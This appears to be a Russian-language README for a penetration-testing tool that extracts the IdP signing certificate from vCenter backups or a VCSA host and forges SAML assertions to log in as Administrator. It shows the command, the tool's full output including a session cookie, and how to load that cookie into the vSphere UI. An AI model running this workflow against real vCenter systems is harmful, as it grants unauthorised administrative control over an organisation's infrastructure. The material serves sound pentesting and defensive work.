
Инструмент для извлечения сертификата IdP из резервных копий vCenter и входа в систему как Administrator
Инструмент для извлечения сертификата поставщика удостоверений (IdP) из резервных копий vCenter и входа в систему в качестве Administrator
Обычно во время пентестов мы получаем доступ к резервным копиям vCenter на файловом сервере или получаем root-доступ к хосту VCSA через недавние CVE. Вход в vCenter vSphere UI позволяет нам легко получить доступ к другим системам и конфиденциальной информации, а также продемонстрировать заказчикам влияние этих находок.
Файл data.mdb содержит сертификаты и может быть найден в резервных копиях vCenter, а также на хосте VCSA при наличии root-прав. Эти сертификаты хранятся в открытом виде (cleartext) и могут использоваться для подписи любого запроса аутентификации SAML для любого пользователя — включая встроенную учётную запись Administrator.
Если вы хотите узнать больше о различных сценариях использования этого инструмента и о том, как мы использовали его для получения административного доступа к хостам vCenter, ознакомьтесь с нашим постом в блоге: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/
root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640
Используя указанный выше cookie, откройте экземпляр VCSA по адресу https://<VCSA>/ui, добавьте cookie для пути /ui и снова перейдите по адресу https://<VCSA>/ui.

Это программное обеспечение создано исключительно для академических исследований и разработки эффективных защитных методов и не предназначено для использования для атак на системы, кроме случаев явного разрешения. Сопровождающие проекта не несут ответственности за неправомерное использование данного программного обеспечения. Используйте ответственно.